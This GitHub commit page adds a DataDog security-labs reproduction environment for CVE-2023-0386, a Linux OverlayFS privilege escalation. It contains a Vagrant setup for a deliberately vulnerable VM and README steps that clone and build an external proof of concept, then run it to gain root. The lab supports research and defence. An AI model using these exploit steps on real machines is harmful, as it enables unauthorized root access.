forked from DataDog/security-labs-pocs
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
275d8fe
commit 2c73398
Showing
5 changed files
with
66 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| .vagrant |
45 changes: 45 additions & 0 deletions
45
proof-of-concept-exploits/overlayfs-cve-2023-0386/README.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,45 @@ | ||
| # CVE-2023-0386 | ||
|
|
||
| This folder contains a virtual machine and instructions to reproduce [CVE-2023-0386](https://nvd.nist.gov/vuln/detail/CVE-2023-0386), a vulnerability in the Linux kernel’s OverlayFS subsystem that allows an unprivileged user to escalate their privileges to root. | ||
|
|
||
| ## How to reproduce | ||
|
|
||
| * Start the virtual machine (based on Ubuntu 22.04.1, kernel 5.15.0-57-generic): | ||
|
|
||
| ``` | ||
| vagrant up | ||
| ``` | ||
|
|
||
| * SSH to the machine as an unprivileged user: | ||
|
|
||
| ``` | ||
| vagrant ssh --command "sudo su john -c 'cd; bash'" | ||
| ``` | ||
|
|
||
| ```bash | ||
| john@ubuntu-jammy:~$ id | ||
| uid=1002(john) gid=1002(john) groups=1002(john) | ||
| ``` | ||
|
|
||
| * Clone and compile the [proof of concept repository](https://github.com/xkaneiki/CVE-2023-0386/) | ||
|
|
||
| ``` | ||
| git clone https://github.com/xkaneiki/CVE-2023-0386.git | ||
| cd CVE-2023-0386 | ||
| git checkout c4c65cefca1365c807c397e953d048506f3de195 | ||
| make all | ||
| ``` | ||
|
|
||
| * Run the following commands to exploit the vulnerability and escalate to root: | ||
|
|
||
| ``` | ||
| ./fuse ./ovlcap/lower ./gc >/dev/null 2>&1 & | ||
| ./exp | ||
| ``` | ||
|
|
||
|  | ||
|
|
||
| ## Credits | ||
|
|
||
| Proof-of-concept: https://github.com/xkaneiki/CVE-2023-0386/ | ||
| Reproduction for Datadog: Ryan Simon |
11 changes: 11 additions & 0 deletions
11
proof-of-concept-exploits/overlayfs-cve-2023-0386/Vagrantfile
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,11 @@ | ||
| Vagrant.configure("2") do |config| | ||
| config.vm.box="ubuntu-22.04-vulnerable" | ||
| config.vm.box_url = "https://cloud-images.ubuntu.com/releases/22.04/release-20230107/ubuntu-22.04-server-cloudimg-amd64-vagrant.box" | ||
| config.vm.box_download_checksum = "f37c8dbda2d712ffb6242b7b9d88058298caf3a860ae29620de1cd4d02b59a9a" | ||
| config.vm.box_download_checksum_type = "sha256" | ||
|
|
||
| # Disable the default synced folder | ||
| config.vm.synced_folder '.', '/vagrant', disabled: true | ||
|
|
||
| config.vm.provision "shell", path: "provision.sh" | ||
| end |
9 changes: 9 additions & 0 deletions
9
proof-of-concept-exploits/overlayfs-cve-2023-0386/provision.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,9 @@ | ||
| #!/bin/bash | ||
|
|
||
| # Pre-requisites | ||
| sudo apt update | ||
| sudo apt-get install -y make gcc libfuse-dev libcap-dev | ||
|
|
||
|
|
||
| # Underprivileged user | ||
| sudo useradd john --create-home --shell /bin/bash |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.